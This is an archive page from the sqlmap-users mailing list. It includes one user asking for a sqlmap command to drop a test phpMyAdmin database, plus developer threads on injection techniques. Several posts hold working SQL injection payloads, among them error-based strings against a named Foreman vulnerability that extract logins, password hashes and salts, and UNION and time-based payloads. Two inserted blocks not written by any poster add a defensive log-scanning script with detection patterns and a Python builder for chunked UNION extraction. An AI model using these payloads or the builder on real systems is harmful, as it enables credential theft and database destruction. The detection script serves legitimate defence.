sqlmap-users Mailing List for sqlmap
From: Turritopsis D. T. En M. <ce...@te...> - 2019-04-17 15:24:13

Subject/Topic: How do I determine if versions of phpMyAdmin before 4.8.5 are SQL injectable using sqlmap?

Good evening from Singapore,

Our customer (company name is Confidential/not disclosed) reported that their MySQL database has been found missing or was deleted a few times. They are using Ubuntu 16.04 LTS Linux server with Apache2 Web Server, MySQL and PHP (LAMP). We responded to these security incidents by changing the passwords of the regular user, root user, and MySQL database user root. We have also examined /var/log/auth.log and think that the hacker could not have come in through ssh or sftp over ssh. From /var/log/mysql/error.log, we can ascertain that the MySQL database has been deleted at certain timings. We have also found nothing abnormal after examining /var/log/apache2/access.log. Even though we have secured the Ubuntu Linux server by changing passwords, the hacker was still able to delete our customer's MySQL database again and again.

I have already proposed to install ModSecurity Open Source Web Application Firewall (WAF) to defend against web application attacks but my boss has told me to put that on hold at the moment. In fact, I have already deployed ModSecurity 2.9.0 on a Ubuntu 16.04 LTS *Testing* server and found that it actively detects and logs Nessus and sqlmap vulnerability scans in blocking mode.

Since we did not find any evidence that the hacker had breached our customer's Ubuntu 16.04 LTS production server through ssh or Teamviewer, we suspect that the hacker could have achieved it by SQL injection. I took the initiative of downloading and installing Nessus Professional 8.3.1 Trial version for Windows 64-bit. The vulnerability scan report generated by Nessus Web Application Tests shows that our customer is using a version of phpMyAdmin prior to 4.8.5 which could be vulnerable to SQL injection using the designer feature. Further research shows that I can use sqlmap to determine if phpMyAdmin is SQL injectable.

I already have a Testing Ubuntu 16.04 LTS Linux server with a Testing MySQL database and a Testing phpMyAdmin 4.8.4. I have purposely installed phpMyAdmin 4.8.4 because this version was reported to be vulnerable to SQL injection using the designer feature, and our customer is using a vulnerable version, according to CVE-2019-6798 ( https://nvd.nist.gov/vuln/detail/CVE-2019-6798 ). Then I proceeded to download and execute sqlmap on our Ubuntu Linux desktop against our Testing server. No matter how many commands I try, sqlmap always reports that phpMyAdmin 4.8.4 is *NOT* SQL injectable. Perhaps I was using the wrong sqlmap commands all the time? The following is one of the many sqlmap commands I have used.

$ python sqlmap.py -u "https://www.EXAMPLE.com/phymyadmin/index.php?id=1" --level=1 --dbms=mysql --sql-query="drop database"

Replace database with the database name.

May I know what is the correct sqlmap command that I should use to determine that my Testing phpMyAdmin 4.8.4 is SQL injectable? I would like to know if I can successfully drop/delete the Testing database on our Testing server. If I can successfully drop/delete the Testing MySQL database using sqlmap, I would be able to conclude that the hacker must have carried out SQL injection to drop/delete the customer's database. I have already turned off the Testing ModSecurity Web Application Firewall on our Testing server to allow sqlmap to go through.

Please point me to any good tutorial on SQL injection using sqlmap. Maybe I do not understand SQL injection well enough.

Our customer is also using a customised in-house inventory management system that relies on PHP application and MySQL database. Would open source Snort Intrusion Detection System (IDS) and Intrusion Prevention System (IPS) be able to detect and block SQL injection as well?

Please advise. Thank you very much.

-----BEGIN EMAIL SIGNATURE-----
The Gospel for all Targeted Individuals (TIs): [The New York Times] Microwave Weapons Are Prime Suspect in Ills of U.S. Embassy Workers
Link: https://www.nytimes.com/2018/09/01/science/sonic-attack-cuba-microwave.html
********************************************************************************************
Singaporean Mr. Turritopsis Dohrnii Teo En Ming's Academic Qualifications as at 14 Feb 2019
[1] https://tdtemcerts.wordpress.com/
[2] https://tdtemcerts.blogspot.sg/
[3] https://www.scribd.com/user/270125049/Teo-En-Ming
-----END EMAIL SIGNATURE-----
From: Brandon P. <bpe...@gm...> - 2018-05-30 13:53:37

> On May 30, 2018, at 8:49 AM, Miroslav Stampar <mir...@gm...> wrote:
>
> Hi.
>
> Just added new tamper script to the HEAD. Please update and try --tamper=0x2char
>
> p.s. There is no need for unhex (as you'll see by running this new tamper script)

Perfect, this works like a charm! Thanks for the quick update.

> Kind regards,
> Miroslav Stampar
>
> On Wed, May 30, 2018 at 12:49 PM, Brandon Perry <bpe...@gm...> wrote:
> I've come across a SQL injection that uppercases the input, so that 0xaaaa becomes 0XAAAA. This isn't a valid hex value in MySQL since 0X is required to use a lowercase x. I attempted to use a quick --eval argument to change the syntax from 0x to X'', but the single quotes in the X'' syntax end up being escaped with double slashes so the syntax is still broken (X'' -> X\\'\\').
>
> What are the chances a different encoding using UNHEX and CONCAT could be used instead of 0x when using BENCHMARK?
>
> For instance:
>
> BENCHMARK(5000000,MD5(0xaaaa))
>
> Could be rewritten as:
>
> BENCHMARK(5000000,MD5(UNHEX(CONCAT(CHAR(65),CHAR(65),CHAR(65),CHAR(65)))))
>
> Perhaps this is attainable with a tamper script and I am missing it? This would prevent the application from breaking the SQL syntax by changing 0x to 0X.
>
> Any thoughts are appreciated!
>
> --
> Miroslav Stampar
> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2018-05-30 13:49:55

Hi.

Just added new tamper script to the HEAD. Please update and try --tamper=0x2char

p.s. There is no need for unhex (as you'll see by running this new tamper script)

Kind regards,
Miroslav Stampar

On Wed, May 30, 2018 at 12:49 PM, Brandon Perry <bpe...@gm...> wrote:
> I've come across a SQL injection that uppercases the input, so that 0xaaaa becomes 0XAAAA. This isn't a valid hex value in MySQL since 0X is required to use a lowercase x. I attempted to use a quick --eval argument to change the syntax from 0x to X'', but the single quotes in the X'' syntax end up being escaped with double slashes so the syntax is still broken (X'' -> X\\'\\').
>
> What are the chances a different encoding using UNHEX and CONCAT could be used instead of 0x when using BENCHMARK?
>
> For instance:
>
> BENCHMARK(5000000,MD5(0xaaaa))
>
> Could be rewritten as:
>
> BENCHMARK(5000000,MD5(UNHEX(CONCAT(CHAR(65),CHAR(65),CHAR(65),CHAR(65)))))
>
> Perhaps this is attainable with a tamper script and I am missing it? This would prevent the application from breaking the SQL syntax by changing 0x to 0X.
>
> Any thoughts are appreciated!

--
Miroslav Stampar
http://about.me/stamparm
From: Brandon P. <bpe...@gm...> - 2018-05-30 10:49:27

I've come across a SQL injection that uppercases the input, so that 0xaaaa becomes 0XAAAA. This isn't a valid hex value in MySQL since 0X is required to use a lowercase x. I attempted to use a quick --eval argument to change the syntax from 0x to X'', but the single quotes in the X'' syntax end up being escaped with double slashes so the syntax is still broken (X'' -> X\\'\\').

What are the chances a different encoding using UNHEX and CONCAT could be used instead of 0x when using BENCHMARK?

For instance:

BENCHMARK(5000000,MD5(0xaaaa))

Could be rewritten as:

BENCHMARK(5000000,MD5(UNHEX(CONCAT(CHAR(65),CHAR(65),CHAR(65),CHAR(65)))))

Perhaps this is attainable with a tamper script and I am missing it? This would prevent the application from breaking the SQL syntax by changing 0x to 0X.

Any thoughts are appreciated!
From: Miroslav S. <mir...@gm...> - 2018-04-03 10:55:57

In lots of cases you'll have some sort of length constraints in either GET or POST body. Putting all those SELECTs into single requests simply won't work (especially in GET cases).

One more thing. In case of (e.g.) MsSQL there is no "LIMIT m,n" mechanism. Hence, sqlmap uses something called "pivoting" to dump table content, which requires different queries for different column values.

Bye

On Thu, Mar 29, 2018 at 1:59 AM, Brandon Perry <bpe...@gm...> wrote:
> I'm currently exploiting a recent vulnerability announced in Foreman versions 1.9+ through 1.16.1. The available techniques are boolean, time, and error-based.
>
> Error based is the fastest obviously, but it seems like it could be faster. Currently, it performs an error-based exfil in a similar way MySQL error-based injections are done, which is a single value at a time. IIRC, MySQL errors get truncated so that you generally can't exfil more than 50 or so characters at a time, so this strategy makes sense in those cases.
>
> However, PostgreSQL errors that are bubbled up don't (seem to) have this limitation and will return very lengthy error messages.
>
> Currently, sqlmap will grab a value per column per row per request. That looks like this.
>
> widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_salt AS CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1
>
> widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_hash AS CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1
>
> widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(login AS CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1
>
> Each of these values takes a single request/response. But they could easily be combined into one with each distinct value being pulled out with a regular expression.
>
> widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_salt AS CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_hash AS CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(login AS CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1
>
> But there may be a reason sqlmap does this in the former way. Anyway, just my 2c.

--
Miroslav Stampar
http://about.me/stamparm
From: Brandon P. <bpe...@gm...> - 2018-03-28 23:59:42

I'm currently exploiting a recent vulnerability announced in Foreman versions 1.9+ through 1.16.1. The available techniques are boolean, time, and error-based.

Error based is the fastest obviously, but it seems like it could be faster. Currently, it performs an error-based exfil in a similar way MySQL error-based injections are done, which is a single value at a time. IIRC, MySQL errors get truncated so that you generally can't exfil more than 50 or so characters at a time, so this strategy makes sense in those cases.

However, PostgreSQL errors that are bubbled up don't (seem to) have this limitation and will return very lengthy error messages.

Currently, sqlmap will grab a value per column per row per request. That looks like this.

widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_salt AS CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1

widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_hash AS CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1

widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(login AS CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1

Each of these values takes a single request/response. But they could easily be combined into one with each distinct value being pulled out with a regular expression.

widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_salt AS CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_hash AS CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(login AS CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1

But there may be a reason sqlmap does this in the former way. Anyway, just my 2c.
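The phpMyAdmin post at the top of this page reports that nothing abnormal was seen in access.log, and the 0x2char and Foreman threads show why a plain keyword grep can miss injection traffic: the same string may arrive as a 0x hex literal (upper- or lower-cased by the application), as UNHEX(CONCAT(CHAR(65),...)), or as a CHR(113)||CHR(107)||... chain. The following is an added example, not code from sqlmap or from any poster in these threads: a Python triage script for offline log review that folds those encodings back into plain quoted strings before matching a handful of indicator patterns over access-log lines. The log lines, the indicator names and the "testdb" name inside the hex literal are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined-log style); not real traffic.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [17/Apr/2019:21:14:02 +0800] "GET /phpmyadmin/index.php?id=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [17/Apr/2019:21:15:33 +0800] "GET /index.php?id=1%20AND%20BENCHMARK(5000000,MD5(0xaaaa)) HTTP/1.1" 200 512',
    '10.0.0.9 - - [17/Apr/2019:21:16:01 +0800] "GET /index.php?id=1%20AND%20BENCHMARK(5000000,MD5(UNHEX(CONCAT(CHAR(65),CHAR(65),CHAR(65),CHAR(65))))) HTTP/1.1" 200 512',
    '10.0.0.9 - - [17/Apr/2019:21:17:45 +0800] "GET /widgets?q=1)%20AND%208137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT%20login%20FROM%20users)::text%20AS%20NUMERIC)-- HTTP/1.1" 500 301',
    '10.0.0.9 - - [17/Apr/2019:21:18:10 +0800] "GET /index.php?id=-1%20UNION%20ALL%20SELECT%20NULL,0x64726f7020646174616261736520746573746462,NULL-- HTTP/1.1" 200 0',
]

_REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def _printable(code):
    """Render one byte / code point inside a quoted literal; escape quotes and non-printables."""
    return chr(code) if 32 <= code < 127 and code != 0x27 else "\\x%02x" % code


def _hex_to_literal(hexdigits):
    """0x64726f70, X'64726f70' and UNHEX('64726f70') all become 'drop'."""
    if len(hexdigits) % 2:
        hexdigits = "0" + hexdigits
    return "'" + "".join(_printable(b) for b in bytes.fromhex(hexdigits)) + "'"


def canonicalize(sql):
    """Fold the literal encodings seen in these threads back into plain quoted strings.

    Hex forms are matched case-insensitively on purpose: MySQL itself only accepts a
    lowercase 0x, but an application that upper-cases input (the 0x2char case) leaves
    0XAAAA in the log, and a reviewer wants both spellings to collapse to the same text.
    """
    s = re.sub(r"\b0x([0-9a-f]+)\b", lambda m: _hex_to_literal(m.group(1)), sql, flags=re.I)
    s = re.sub(r"\bX'([0-9a-f]*)'", lambda m: _hex_to_literal(m.group(1)), s, flags=re.I)
    # MySQL CHAR(65,66) and PostgreSQL CHR(113): code points -> characters
    s = re.sub(r"\bCHA?R\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)",
               lambda m: "'" + "".join(_printable(int(n)) for n in m.group(1).split(",")) + "'",
               s, flags=re.I)
    previous = None
    while previous != s:  # fold concatenations until nothing changes
        previous = s
        s = re.sub(r"(?<!\w)\(\s*('[^']*')\s*\)", r"\1", s)        # ('lit')  -> 'lit'
        s = re.sub(r"'([^']*)'\s*\|\|\s*'([^']*)'", r"'\1\2'", s)  # 'a'||'b' -> 'ab'
        s = re.sub(r"\bCONCAT\(\s*'[^']*'(?:\s*,\s*'[^']*')*\s*\)",  # CONCAT('a','b') -> 'ab'
                   lambda m: "'" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "'",
                   s, flags=re.I)
        s = re.sub(r"\bUNHEX\(\s*'([0-9a-f]*)'\s*\)",
                   lambda m: _hex_to_literal(m.group(1)), s, flags=re.I)
    return s


# Indicator patterns are run on the canonical form; the names are this example's own.
INDICATORS = [
    ("union-select", re.compile(r"\bUNION\b(?:\s+ALL)?\s+SELECT\b", re.I)),
    ("drop-statement", re.compile(r"\bDROP\s+(?:DATABASE|SCHEMA|TABLE)\b", re.I)),
    ("time-based-function", re.compile(r"\b(?:BENCHMARK|SLEEP|PG_SLEEP)\s*\(", re.I)),
    ("error-based-cast", re.compile(r"\bCAST\s*\(.*\bAS\s+NUMERIC\b", re.I)),
    # five-letter q...q literals like the qkxzq / qbxqq pair that delimit values in the Foreman payloads
    ("marker-literal", re.compile(r"'q[a-z]{3}q'", re.I)),
    ("comment-terminator", re.compile(r"--(?:\s|$)|/\*")),
]


def scan_access_log(lines):
    """Return one finding per request whose decoded query matches at least one indicator."""
    findings = []
    for line in lines:
        match = _REQUEST.search(line)
        if not match or "?" not in match.group(1):
            continue
        path, _, query = match.group(1).partition("?")
        canonical = canonicalize(unquote_plus(query))
        hits = [name for name, pattern in INDICATORS if pattern.search(canonical)]
        if hits:
            findings.append({"client": line.split()[0], "path": path,
                             "query": canonical, "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_ACCESS_LOG):
        print(finding["client"], finding["path"], ",".join(finding["indicators"]))
        print("    ", finding["query"])
```

Running it over a real file is `scan_access_log(open("/var/log/apache2/access.log"))`. The point of the canonicalisation step is that the two BENCHMARK requests, which look unrelated in the raw log, collapse to the same query, and the CHR() chain becomes the readable 'qkxzq' marker that the Foreman payloads use to delimit the values they extract. A WAF in front of the application does this kind of normalisation in-line; this script is only for after-the-fact review of logs that were written without one.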
From: Brandon P. <bpe...@gm...> - 2017-11-14 20:51:01

Put quotes around your URL. The & is being interpreted by bash and ending your URL early.

> On Nov 14, 2017, at 2:21 PM, Oleg V. Melnichuk <ol...@gm...> wrote:
>
> Hi
>
> I have several sites under the nginx server with different server_name in a virtual machine with one IP address. Under this IP in the /etc/hosts file of the host machine are written server_name, which correspond to nginx. Firefox for a specific server_name goes to the corresponding site.
>
> the sqlmap command on one of the pages of one of the server_name results in a 404 error:
>
> u@u:~$ sqlmap -u http://1.bla/index.php?route=product/product&product_id=50
> [1] 4869
> u@u:~$ _
>  ___ ___| |_____ ___ ___ {1.0.4.0#dev}
> |_ -| . | | | .'| . |
> |___|_ |_|_|_|_|__,| _|
> |_| |_| http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 21:17:07
>
> [21:17:09] [INFO] testing connection to the target URL
> [21:17:10] [CRITICAL] page not found (404)
> it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n]
>
> [1]+ Stopped sqlmap -u http://1.bla/index.php?route=product/product
> u@u:~$
>
> What are the ideas?
>
> --
> Regards, Oleg V. Melnichuk
From: Oleg V. M. <ol...@gm...> - 2017-11-14 20:21:19

Hi

I have several sites under the nginx server with different server_name in a virtual machine with one IP address. Under this IP in the /etc/hosts file of the host machine are written server_name, which correspond to nginx. Firefox for a specific server_name goes to the corresponding site.

The sqlmap command on one of the pages of one of the server_name results in a 404 error:

u@u:~$ sqlmap -u http://1.bla/index.php?route=product/product&product_id=50
[1] 4869
u@u:~$ _
 ___ ___| |_____ ___ ___ {1.0.4.0#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:17:07

[21:17:09] [INFO] testing connection to the target URL
[21:17:10] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n]

[1]+ Stopped sqlmap -u http://1.bla/index.php?route=product/product
u@u:~$

What are the ideas?

--
Regards, Oleg V. Melnichuk
From: Brandon P. <bpe...@gm...> - 2017-08-16 01:41:24

> On Aug 15, 2017, at 8:21 PM, Miroslav Stampar <mir...@gm...> wrote:
>
> Hi.
>
> sqlmap either does the full dump (FULL UNION case) or one row at a time (PARTIAL UNION case - e.g. single row of result). There is no "let's dump N rows per request" - this is really not possible to do in a simple and generic way as targets tend to cut the results in most exotic ways (e.g. first 1024 characters). Also, concatenation of rows in non-MySQL DBMSes is a challenge at least.

Thanks, you're right. I'm thinking about this purely from a MySQL perspective. Thanks for the insight.

> Bye
>
> On Wed, Aug 16, 2017 at 12:36 AM, Brandon Perry <bpe...@gm...> wrote:
> Looking at some later requests, it appears that dumping a row from a table is performed this way (each column is concated together). So it looks like this kind of strategy is just not used consistently when limited to a single row.
>
> However, it could still chunk multiple rows into a single concat statement (selecting 10 rows per request for instance, instead of just one).
>
> Just thoughts.
>
> > On Aug 15, 2017, at 4:04 PM, Brandon Perry <bpe...@gm...> wrote:
> >
> > Currently, it seems that sqlmap will use a payload such as the following if a UNIONable parameter is found that can only return one row in order for data to be exfil'ed.
> >
> > -16301 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71787a7871,IFNULL(CAST(schema_name AS CHAR),0x20),0x716a706271) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
> >
> > When enumerating databases in an injection like this, sqlmap will make a single request per db name (note the LIMIT clause). This is a bit inefficient. I understand there may be length limitations to query string parameters, but I'm curious why sqlmap wouldn't use a more efficient payload, such as the following.
> >
> > -16301 UNION ALL SELECT NULL,NULL,CONCAT(0x41414141, (SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1), 0x41414141,(SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1), 0x41414141,(SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
> >
> > Error-based payloads certainly have length limitations in the data they can get out per request, but is there something preventing sqlmap from implementing a more efficient single-row UNION strategy when exfiltrating data?
> >
> > Let me know if this doesn't make sense.
>
> --
> Miroslav Stampar
> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2017-08-16 01:21:10
|
Hi.

sqlmap either does the full dump (FULL UNION case) or one row at a time (PARTIAL UNION case - e.g. single row of result). There is no "let's dump N rows per request" - this is really not possible to do in a simple and generic way as targets tend to cut the results in most exotic ways (e.g. first 1024 characters). Also, concatenation of rows in non-MySQL DBMSes is a challenge at least.

Bye

On Wed, Aug 16, 2017 at 12:36 AM, Brandon Perry <bpe...@gm...> wrote:
> Looking at some later requests, it appears that dumping a row from a table is performed this way (each column is concated together). So it looks like this kind of strategy is just not used consistently when limited to a single row.
>
> However, it could still chunk multiple rows into a single concat statement (selecting 10 rows per request for instance, instead of just one).
>
> Just thoughts.
>
> > On Aug 15, 2017, at 4:04 PM, Brandon Perry <bpe...@gm...> wrote:
> >
> > Currently, it seems that sqlmap will use a payload such as the following if a UNIONable parameter is found that can only return one row in order for data to be exfil’ed.
> >
> > -16301 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71787a7871,IFNULL(CAST(schema_name AS CHAR),0x20),0x716a706271) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
> >
> > When enumerating databases in an injection like this, sqlmap will make a single request per db name (note the LIMIT clause). This is a bit inefficient. I understand there may be length limitations to query string parameters, but I’m curious why sqlmap wouldn’t use a more efficient payload, such as the following.
> >
> > -16301 UNION ALL SELECT NULL,NULL,CONCAT(0x41414141, (SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1), 0x41414141,(SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1), 0x41414141,(SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
> >
> > Error-based payloads certainly have length limitations in the data they can get out per request, but is there something preventing sqlmap from implementing a more efficient single-row UNION strategy when exfiltrating data?
> >
> > Let me know if this doesn’t make sense.

--
Miroslav Stampar
http://about.me/stamparm |
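The exchange above contrasts sqlmap's one-row-per-request UNION payload with the idea of gluing several LIMIT i,1 sub-selects into one CONCAT. The script below is an added example for this thread, not sqlmap's own code: it builds both payload shapes and runs the chunked one against a constructed stand-in page (fake_target) that reflects a single UNION row and cuts it after a fixed number of characters, the kind of "exotic" truncation Miroslav refers to. The SCHEMATA list, the page limit and the 11-column layout are constructed for the demonstration. One detail worth noticing: the markers in the thread's payload, 0x71787a7871 and 0x716a706271, are simply the hex encoding of the strings qxzxq and qjpbq, which is why the builder reproduces that payload byte for byte.

```python
"""Single-row vs. chunked UNION extraction, with the two ways chunking breaks.

Added example for this thread; it is not sqlmap code. fake_target is a
constructed stand-in for the vulnerable page: it reflects one UNION row and cuts
the reflected text after page_limit characters. SCHEMATA stands in for
INFORMATION_SCHEMA.SCHEMATA.
"""
import re

# sqlmap wraps every extracted value in marker strings; the markers in the
# thread's payload, 0x71787a7871 / 0x716a706271, are just the hex of these two.
START, END = "qxzxq", "qjpbq"

SCHEMATA = ["information_schema", "mysql", "performance_schema",
            "sys", "app", "app_archive", "reports"]          # constructed rows


def hexlit(s: str) -> str:
    """MySQL hex-string literal (0x...) so the payload needs no quotes."""
    return "0x" + s.encode().hex()


def wrapped(col: str, table: str, index: int) -> str:
    """One row, one value, wrapped in markers: the sub-select seen in the thread."""
    return (f"(SELECT CONCAT({hexlit(START)},IFNULL(CAST({col} AS CHAR),0x20),"
            f"{hexlit(END)}) FROM {table} LIMIT {index},1)")


def union_payload(expr: str, ncols: int, inject_col: int) -> str:
    """Places expr in the one reflected column of an ncols-wide UNION."""
    cells = ["NULL"] * ncols
    cells[inject_col] = expr
    return "-16301 UNION ALL SELECT " + ",".join(cells)


def single_row_payload(col, table, index, ncols, inject_col):
    return union_payload(wrapped(col, table, index), ncols, inject_col)


def chunk_payload(col, table, first, count, ncols, inject_col):
    """Brandon's idea: several LIMIT i,1 sub-selects glued together by one CONCAT."""
    parts = [wrapped(col, table, i) for i in range(first, first + count)]
    return union_payload("CONCAT(" + ",".join(parts) + ")", ncols, inject_col)


def parse(page: str) -> list:
    """Values that came back complete, i.e. with both markers around them."""
    return re.findall(re.escape(START) + "(.*?)" + re.escape(END), page, re.S)


def fake_target(payload: str, page_limit: int) -> str:
    """Constructed vulnerable page. It evaluates only what the example needs:
    every 'LIMIT i,1' yields row i of SCHEMATA wrapped in markers, and the
    reflected text is cut at page_limit characters. A sub-select past the last
    row returns no row, i.e. NULL, and MySQL's CONCAT(..., NULL, ...) is NULL,
    so the whole chunk vanishes: IFNULL guards the column, not the sub-select."""
    rows = [int(i) for i in re.findall(r"LIMIT (\d+),1", payload)]
    if any(i >= len(SCHEMATA) for i in rows):
        body = ""
    else:
        body = "".join(START + SCHEMATA[i] + END for i in rows)
    return "<html><body>" + body[:page_limit] + "</body></html>"


def extract_all(col, table, total, ncols, inject_col, chunk, page_limit):
    """Pulls `total` rows, `chunk` per request, shrinking the chunk whenever
    the page cut the result. Returns (values, number_of_requests)."""
    out, index, requests = [], 0, 0
    while index < total:
        count = min(chunk, total - index)        # never ask past the last row (NULL trap above)
        page = fake_target(chunk_payload(col, table, index, count, ncols, inject_col), page_limit)
        requests += 1
        values = parse(page)
        if not values:
            raise RuntimeError("not even one wrapped value fits in the page")
        out.extend(values)
        index += len(values)
        if len(values) < count:                  # truncated: keep what fit, ask for less next time
            chunk = len(values)
    return out, requests


if __name__ == "__main__":
    print(single_row_payload("schema_name", "INFORMATION_SCHEMA.SCHEMATA", 4, 11, 2))
    args = ("schema_name", "INFORMATION_SCHEMA.SCHEMATA", len(SCHEMATA), 11, 2)
    for chunk, limit in ((1, 1000), (3, 1000), (3, 60)):
        values, n = extract_all(*args, chunk=chunk, page_limit=limit)
        print(f"chunk={chunk} page_limit={limit}: {n} requests for {len(values)} rows")
```

With no truncation the chunked strategy fetches the seven constructed rows in three requests instead of seven; with a 60-character page limit it still gets all of them, but only after backing off the chunk size, and a chunk that reaches past the last row comes back empty because the outer CONCAT sees a NULL. Those two behaviours, plus the fact that the back-off logic would have to be retuned for every way a target can cut output, are the generic problem Miroslav describes.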
From: Brandon P. <bpe...@gm...> - 2017-08-15 22:36:20
|
Looking at some later requests, it appears that dumping a row from a table is performed this way (each column is concated together). So it looks like this kind of strategy is just not used consistently when limited to a single row.

However, it could still chunk multiple rows into a single concat statement (selecting 10 rows per request for instance, instead of just one).

Just thoughts.

> On Aug 15, 2017, at 4:04 PM, Brandon Perry <bpe...@gm...> wrote:
>
> Currently, it seems that sqlmap will use a payload such as the following if a UNIONable parameter is found that can only return one row in order for data to be exfil’ed.
>
> -16301 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71787a7871,IFNULL(CAST(schema_name AS CHAR),0x20),0x716a706271) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
>
> When enumerating databases in an injection like this, sqlmap will make a single request per db name (note the LIMIT clause). This is a bit inefficient. I understand there may be length limitations to query string parameters, but I’m curious why sqlmap wouldn’t use a more efficient payload, such as the following.
>
> -16301 UNION ALL SELECT NULL,NULL,CONCAT(0x41414141, (SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1), 0x41414141,(SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1), 0x41414141,(SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
>
> Error-based payloads certainly have length limitations in the data they can get out per request, but is there something preventing sqlmap from implementing a more efficient single-row UNION strategy when exfiltrating data?
>
> Let me know if this doesn’t make sense. |
From: Brandon P. <bpe...@gm...> - 2017-08-15 21:04:46
|
